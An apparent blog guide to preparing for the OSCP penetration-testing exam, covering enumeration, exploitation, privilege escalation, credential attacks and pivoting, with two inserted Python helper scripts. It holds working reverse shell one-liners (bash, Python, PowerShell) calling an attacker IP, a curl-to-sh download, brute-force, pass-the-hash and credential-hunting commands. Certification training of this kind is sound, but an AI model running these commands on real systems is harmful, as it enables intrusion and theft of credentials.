How to Prepare for OSCP in 2026: Tools, Commands, Resources & Methodology

The Offensive Security Certified Professional (OSCP) is still considered the gold standard for penetration testing certifications in 2026. Unlike multiple-choice exams, OSCP demands that you actually compromise machines within a 24-hour exam window — no shortcuts, no guessing. This guide walks you through everything: the essential tools, the must-know commands, the methodology, and the best free resources to get you from zero to exam-ready.

Phase 0: Mindset and Prerequisites

Before touching a single tool, understand what OSCP actually tests: manual exploitation skill, methodical enumeration, and persistence. Automated exploitation with Metasploit is severely limited in the exam. You need to understand how and why exploits work, not just run them.

Recommended prerequisites before starting PEN-200:

  • Solid Linux command line skills (navigate, search, manage processes, edit files)
  • Basic networking: TCP/IP, DNS, HTTP, SMB, FTP protocols
  • Familiarity with Python scripting (modify public exploits, write simple automation)
  • Complete TryHackMe’s “Pre-Security” and “Jr Penetration Tester” paths first

Phase 1: Reconnaissance and Enumeration

In OSCP, enumeration is everything. 80% of your time should be spent here. Most students fail not because they can’t exploit — they fail because they miss something during enumeration. Enumerate everything twice.

Network Scanning — Nmap

# Initial fast scan — find open ports quickly
nmap -T4 --open -p- 10.10.10.10

# Full version + script scan on discovered ports
nmap -sC -sV -p 22,80,443,445 10.10.10.10 -oA scan_results

# UDP scan (don't skip this — SNMP and DNS are often on UDP)
nmap -sU --top-ports 200 10.10.10.10

# Script scan for specific service
nmap --script=http-title,http-headers -p 80,443 10.10.10.10

Pro tip: Always save output with -oA (all formats). During the exam, you will need to prove you found something — screenshots + saved scan files are your evidence.
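The files -oA writes are also the input to your notes. As an added example that is not part of the original article, the Python below reads the .gnmap (greppable) output of the fast -p- scan and of the follow-up -sC -sV scan, flags any open port the version scan never covered (the classic "missed it during enumeration" mistake), and builds a per-host checklist of the manual enumeration step for each service. Both .gnmap snippets are constructed for this example; 10.10.10.10 is the same placeholder host the article uses, and the service-to-checklist mapping is this example's own summary of the tools listed on this page.

```python
"""Added example, not from the original article: turn the .gnmap files that
`-oA` writes into a per-host enumeration checklist and catch open ports that
the full-port scan found but the version scan never covered.

Both snippets below are constructed stand-ins for real scan output.
"""
import re
from collections import defaultdict

# Constructed stand-in for the .gnmap of `nmap -T4 --open -p- 10.10.10.10 -oA fast`
FAST_GNMAP = (
    "Host: 10.10.10.10 ()\tStatus: Up\n"
    "Host: 10.10.10.10 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, "
    "139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, "
    "8080/open/tcp//http-proxy///\tIgnored State: closed (65530)\n"
)

# Constructed stand-in for the .gnmap of
# `nmap -sC -sV -p 22,80,139,445 10.10.10.10 -oA scan_results` (8080 was forgotten)
VERSION_GNMAP = (
    "Host: 10.10.10.10 ()\tStatus: Up\n"
    "Host: 10.10.10.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.2p1 Ubuntu/, "
    "80/open/tcp//http//Apache httpd 2.4.41/, 139/open/tcp//netbios-ssn//Samba smbd 4/, "
    "445/open/tcp//netbios-ssn//Samba smbd 4.6.2/\tIgnored State: closed (65531)\n"
)

# Manual enumeration step per nmap service name (this example's summary of the
# tools listed in the article; extend it as your own notes grow).
SERVICE_CHECKLIST = {
    "http": "gobuster dir + nikto; read page source; wpscan if WordPress",
    "https": "gobuster dir + nikto; check certificate CN/SAN for hostnames",
    "ssh": "record version; retry later with any credentials found",
    "ftp": "try anonymous login; list and download everything readable",
    "netbios-ssn": "smbclient -L / enum4linux -a / crackmapexec --shares",
    "microsoft-ds": "smbclient -L / enum4linux -a / crackmapexec --shares",
    "mysql": "mysql -h <host> -u root -p (if reachable)",
    "ldap": "ldapsearch -x -H ldap://<host> -b <base dn>",
    "snmp": "snmpwalk -c public -v1 / onesixtyone",
}

# One greppable port entry: port/state/proto/owner/service/rpc/version/
ENTRY_RE = re.compile(r"(\d+)/([^/]+)/([^/]+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/")


def parse_gnmap(text):
    """Return {host: [(port, proto, state, service, version), ...]}."""
    hosts = defaultdict(list)
    for line in text.splitlines():
        if not line.startswith("Host:") or "\tPorts: " not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("\tPorts: ", 1)[1].split("\t", 1)[0]
        for m in ENTRY_RE.finditer(ports_field):
            port, state, proto, _owner, service, _rpc, version = m.groups()
            hosts[host].append((int(port), proto, state, service, version.strip()))
    return dict(hosts)


def missing_ports(full_scan, version_scan):
    """Open ports from the -p- scan that the -sC -sV scan did not include."""
    gaps = {}
    for host, entries in full_scan.items():
        full_open = {p for p, _, st, _, _ in entries if st == "open"}
        covered = {p for p, _, _, _, _ in version_scan.get(host, [])}
        missing = sorted(full_open - covered)
        if missing:
            gaps[host] = missing
    return gaps


def checklist(version_scan):
    """Per host: (port, service, version, next manual step) for every open port."""
    out = {}
    for host, entries in version_scan.items():
        steps = []
        for port, _proto, state, service, version in sorted(entries):
            if state != "open":
                continue
            todo = SERVICE_CHECKLIST.get(service, "banner grab with nc; searchsploit the version")
            steps.append((port, service, version, todo))
        out[host] = steps
    return out


if __name__ == "__main__":
    fast, versioned = parse_gnmap(FAST_GNMAP), parse_gnmap(VERSION_GNMAP)
    for host, ports in missing_ports(fast, versioned).items():
        print(f"[!] {host}: open ports never version-scanned: {ports}")
    for host, steps in checklist(versioned).items():
        print(f"== {host} ==")
        for port, service, version, todo in steps:
            print(f"  {port:>5}/{service:<12} {version or '-':<28} -> {todo}")
```

Run it against the real files by reading fast.gnmap and scan_results.gnmap in place of the two constructed strings; the "never version-scanned" warning is the one to act on before moving to exploitation.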

Web Enumeration

# Directory brute-force with gobuster
gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,bak

# Subdomain enumeration
gobuster dns -d target.com -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt

# Nikto web vulnerability scanner
nikto -h http://10.10.10.10

# WPScan for WordPress targets
wpscan --url http://10.10.10.10 --enumerate u,p,t

SMB Enumeration (Windows targets)

# List shares anonymously
smbclient -L //10.10.10.10 -N

# Connect to a share
smbclient //10.10.10.10/share -N

# Enum4linux — full SMB enumeration
enum4linux -a 10.10.10.10

# CrackMapExec — Swiss Army knife for SMB
crackmapexec smb 10.10.10.10 --shares
crackmapexec smb 10.10.10.10 -u admin -p Password123 --shares

Other Service Enumeration

# FTP — check anonymous login
ftp 10.10.10.10
# At prompt: user: anonymous, pass: anything

# SNMP enumeration (UDP 161)
snmpwalk -c public -v1 10.10.10.10
onesixtyone -c /usr/share/doc/onesixtyone/dict.txt 10.10.10.10

# LDAP enumeration
ldapsearch -x -H ldap://10.10.10.10 -b "dc=domain,dc=com"   # -H ldap://host replaces the old -h flag, which current OpenLDAP clients no longer accept

# MySQL (if exposed)
mysql -h 10.10.10.10 -u root -p

Phase 2: Exploitation — Essential Tools

Searchsploit — Finding Public Exploits

# Search for exploits by service name + version
searchsploit apache 2.4.49
searchsploit "windows 10" privilege escalation

# Copy exploit to working directory
searchsploit -m 49512

# Update the local ExploitDB copy (searchsploit and the database ship with Kali)
searchsploit -u

Manual Exploit Modification

Most ExploitDB exploits need adjustment. The typical workflow is:

# 1. Copy exploit
searchsploit -m 49512
cp 49512.py /home/kali/exploits/

# 2. Read it — understand WHAT it does before running it
head -50 49512.py

# 3. Modify target IP, port, payload
nano 49512.py

# 4. Check dependencies
pip install requests  # or whatever it needs

# 5. Run it
python3 49512.py -t 10.10.10.10 -p 80

Metasploit (use carefully — exam limits apply)

# Start Metasploit
msfconsole

# Search for module
search type:exploit name:eternal_blue

# Use a module
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.10.10
set LHOST 10.10.10.11
run

OSCP exam rule: Metasploit with automated payloads (multi/handler with meterpreter) can be used on ONE machine only. Learn to do everything manually — use Metasploit on your “bonus” machine if at all.

Reverse Shell Cheat Sheet

# Start listener (always do this FIRST)
nc -lvnp 4444

# Bash reverse shell
bash -i >& /dev/tcp/10.10.10.11/4444 0>&1

# Python reverse shell
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.10.10.11",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh"])'

# PowerShell reverse shell (Windows)
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.11',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}"

# Upgrade shell to TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Then: Ctrl+Z, stty raw -echo, fg, reset

Phase 3: Post-Exploitation and Privilege Escalation

Getting a low-privilege shell is only the beginning. In OSCP, you need proof.txt from the root/Administrator account. Privilege escalation is the hardest part for most students.

Linux Privilege Escalation

# ALWAYS start with LinPEAS — it finds 90% of vectors
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# Manual checks that LinPEAS covers (know these by heart):

# SUID binaries — can any be abused?
find / -perm -u=s -type f 2>/dev/null

# Sudo rights — what can this user run as root?
sudo -l

# Cron jobs running as root
cat /etc/crontab
ls -la /etc/cron*

# World-writable scripts run by root cron
find / -writable -type f 2>/dev/null | grep -v proc

# Interesting files — credentials, config files
find / -name "*.conf" -readable 2>/dev/null
find / -name "id_rsa" 2>/dev/null
grep -r "password" /var/www/html/ 2>/dev/null

# Check kernel version for kernel exploits (last resort)
uname -a

Windows Privilege Escalation

# WinPEAS — automated Windows privesc checker
.\winPEASx64.exe

# Manual key checks:

# Current user and privileges
whoami /all

# Unquoted service paths (classic Windows vuln)
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\"

# AlwaysInstallElevated registry key
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer

# Stored credentials
cmdkey /list
# If creds exist, use runas:
runas /savedcred /user:admin cmd.exe

# Token impersonation (SeImpersonatePrivilege)
.\PrintSpoofer64.exe -i -c cmd
# Or: .\GodPotato-NET4.exe -cmd "cmd /c whoami"

# Scheduled tasks
schtasks /query /fo LIST /v
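The wmic one-liner above only lists candidates; knowing why an unquoted path is a problem is what lets you confirm or dismiss each one. As an added example that is not part of the original article, the Python below applies the same rule (auto-start service, path not quoted, spaces in the executable path, not under C:\Windows) to a constructed stand-in for `wmic service get name,pathname,startmode /format:csv` output, lists the path prefixes Windows would try while resolving the unquoted path (each prefix's parent directory is what an administrator must confirm is not writable by unprivileged users), and produces the quoted PathName that removes the weakness. The service names and paths are invented for the example.

```python
"""Added example, not from the original article: audit Windows service
PathName values for the unquoted-path weakness and show the corrected value.

SAMPLE_WMIC_CSV is a constructed stand-in for the output of
`wmic service get name,pathname,startmode /format:csv`; every service
name and path in it is invented.
"""
import csv
import io

SAMPLE_WMIC_CSV = r"""Node,Name,PathName,StartMode
WS01,Spooler,C:\Windows\System32\spoolsv.exe,Auto
WS01,VulnSvc,C:\Program Files\Acme Tools\Agent\agent.exe -service,Auto
WS01,GoodSvc,"C:\Program Files\Acme Tools\monitor.exe" -quiet,Auto
WS01,ManualSvc,C:\Custom Apps\helper.exe,Manual
"""


def _exe_part(pathname):
    """The path up to and including the executable; anything after is arguments."""
    p = pathname.strip()
    end = p.lower().find(".exe")
    return p if end == -1 else p[: end + 4]


def is_unquoted_with_spaces(pathname):
    """True when the path is not wrapped in quotes and has a space before the .exe."""
    p = pathname.strip()
    return not p.startswith('"') and " " in _exe_part(p)


def search_candidates(pathname):
    """Paths Windows tries, in order, when it resolves an unquoted path with spaces:
    each prefix that ends at a space is attempted as '<prefix>.exe' before the
    full path is used (this is the documented CreateProcess behaviour)."""
    exe_path = _exe_part(pathname)
    candidates = [exe_path[:i] + ".exe" for i, ch in enumerate(exe_path) if ch == " "]
    candidates.append(exe_path)
    return candidates


def quoted_fix(pathname):
    """Corrected PathName: executable in quotes, arguments left untouched."""
    p = pathname.strip()
    exe = _exe_part(p)
    return f'"{exe}"{p[len(exe):]}'


def audit_services(csv_text, only_auto=True):
    """Return one finding per service that matches the unquoted-path rule."""
    findings = []
    # QUOTE_NONE keeps the literal double quotes that a correctly quoted PathName has.
    reader = csv.DictReader(io.StringIO(csv_text.strip()), quoting=csv.QUOTE_NONE)
    for row in reader:
        path = row["PathName"]
        if only_auto and row["StartMode"].lower() != "auto":
            continue
        if path.lower().startswith("c:\\windows\\"):
            continue  # same exclusion as findstr /i /v "c:\windows\" in the one-liner
        if is_unquoted_with_spaces(path):
            findings.append({
                "name": row["Name"],
                "path": path,
                "candidates": search_candidates(path),
                "fix": quoted_fix(path),
            })
    return findings


if __name__ == "__main__":
    for f in audit_services(SAMPLE_WMIC_CSV):
        print(f"[!] {f['name']}: {f['path']}")
        for c in f["candidates"]:
            print(f"      would try: {c}")
        print(f"      corrected PathName: {f['fix']}")
```

The prefixes the script lists are the ones to check with icacls during a review; the corrected value is what `sc config <name> binPath= "..."` should be set to, with the inner quotes escaped as the page's own Windows examples show.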

Password Cracking and Credential Attacks

# Crack hashes with John
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

# Crack specific hash type with Hashcat
hashcat -m 1000 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt
# -m 0 = MD5, -m 1000 = NTLM, -m 1800 = sha512crypt

# Hydra — brute force login services
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.10 ssh
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"

# Pass-the-Hash (Windows)
crackmapexec smb 10.10.10.10 -u admin -H NTLM_HASH_HERE
pth-winexe -U admin%NTLM_HASH //10.10.10.10 cmd.exe

Phase 4: Pivoting and Tunneling

# SSH local port forwarding (access internal service)
ssh -L 8080:192.168.1.10:80 user@10.10.10.10

# SSH dynamic SOCKS proxy (route all traffic through host)
ssh -D 1080 user@10.10.10.10
# Configure proxychains to use 127.0.0.1:1080
proxychains nmap -sT 192.168.1.0/24

# Chisel for tunneling through firewalls
# On attacker:
chisel server -p 9001 --reverse
# On victim:
chisel client 10.10.10.11:9001 R:1080:socks

# Ligolo-ng (modern, recommended for OSCP 2026)
# Attacker:
./proxy -selfcert
# Victim:
./agent -connect 10.10.10.11:11601 -ignore-cert

The OSCP Methodology: Start to Finish

Here is the complete flow you should follow for every single machine, whether in practice labs or the exam:

  1. Scan all ports (nmap -p-) to find everything open
  2. Version detect + default scripts (nmap -sC -sV) on the found ports
  3. Enumerate each service — web, SMB, FTP, SSH, RPC, LDAP, SNMP — leave nothing unchecked
  4. Look for known CVEs (searchsploit service_name version)
  5. Web apps — directory brute force, check source code, look for SQLi/LFI/RFI/SSRF
  6. Get initial foothold — low-privilege shell access
  7. System info + user context (whoami, uname -a, hostname)
  8. Run privesc scripts — LinPEAS or WinPEAS
  9. Identify and exploit privesc vector — SUID, sudo, cron, service, token
  10. Get root/SYSTEM — retrieve proof.txt
  11. Document everything — screenshot + save outputs at every step

Best Free Resources for OSCP Preparation

Platforms

  • TryHackMe — Best for beginners, guided rooms, “Jr Penetration Tester” path is OSCP-aligned
  • Hack The Box — Harder machines, more exam-like. Complete 20+ retired machines with writeups
  • PortSwigger Web Academy — Free, the absolute best resource for web app hacking (SQLi, XSS, SSRF, etc.)
  • VulnHub — Download free VMs to practice locally with no subscription needed
  • PentesterLab — Excellent for web vulnerabilities and real CVE practice

Must-Read References

  • GTFOBins (gtfobins.github.io) — How to abuse Unix binaries for privesc
  • LOLBAS (lolbas-project.github.io) — Windows “Living Off the Land” binaries
  • HackTricks (book.hacktricks.xyz) — The OSCP bible. Every technique, every attack vector, organized by category
  • PayloadsAllTheThings (GitHub) — Payload lists for every vulnerability type
  • RevShells.com — Generate reverse shell one-liners in any language

Specific HTB Machines for OSCP Prep

These retired machines are consistently recommended as OSCP-like training (use writeups after attempting yourself): Blue, Legacy, Devel, Bastard, Beep, Optimum, Arctic, Granny, Grandpa, Jerry, Knife, Irked, Nibbles, Mirai, Networked, Bashed, OpenAdmin, Magic, ServMon

Exam Day Tips

  • Start with the 20-point standalone machines — easier, build momentum and confidence
  • Set a timer — if stuck for 45 minutes, move on and come back
  • Screenshot everything — scan output, exploit commands, shell access, proof.txt with IP
  • Read the proof.txt — you need to type cat proof.txt with your IP visible in the same screenshot
  • Sleep — the exam is 24 hours but most people succeed in 18. Fatigue causes mistakes
  • Use your notes — you can use any notes during the exam. Have templates ready

OSCP is hard, but it is absolutely passable with the right preparation. The community is large and welcoming — if you’re stuck, the r/oscp subreddit and the OffSec Discord are excellent places to get unstuck. The journey itself will make you a significantly better security professional than any other certification path.